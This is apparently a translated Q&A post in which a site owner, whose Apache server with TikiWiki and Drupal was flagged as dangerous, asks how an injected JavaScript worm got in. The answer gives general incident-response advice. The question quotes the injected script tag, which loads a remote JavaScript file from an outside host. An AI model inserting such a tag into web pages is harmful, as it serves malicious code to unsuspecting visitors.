Javascript
JS Worm:如何找到入口點
我的網站被 Google/StopBadware.org 標記為危險,我在幾個 js/html 文件中發現了這一點:
<script type="text/javascript" src="http://oployau.fancountblogger.com:8080/Gigahertz.js"></script> <!--a0e2c33acd6c12bdc9e3f3ba50c98197-->
我清理了幾個文件,我恢復了備份,但如何了解蠕蟲是如何安裝的?我可以在日誌文件中查找什麼?這個伺服器,一個 Centos 5,只用作一個 apache 伺服器,安裝了我們的程序,一個 tikiwiki,一個 drupal。
謝謝塞德里克
_
入侵事件分析絕非易事,特別是如果您沒有遵循標準的恢復程序(使物理伺服器離線,獲取它有權訪問的所有文件系統的扇區映像,從安裝介質完全重建機器,恢復數據) .
通常,您會首先查看所有日誌文件,從 Apache 日誌開始。在您的情況下,最可能的攻擊媒介是 drupal,但它絕不是唯一可能的攻擊媒介,因此應檢查所有日誌(我的意思是所有日誌)。根據您使用的文件系統,可以採取其他步驟來確定感染時發生的活動,並確定使用的攻擊媒介和完成的操作。
同時,檢查您的機器正在執行的所有軟體,並確保它們都是最新的。這包括您所有的 drupal 模組、主題等。我還會用梳子檢查任何自定義程式碼。
編輯:我忘了提到這樣一個事實,在您的情況下,由於您顯然沒有內部的相關專業知識,您可能需要考慮將事件承包給一家進行法醫分析的安全公司:這可能有點昂貴的一面,但你會得到關於發生了什麼以及如何防止它的明確答案。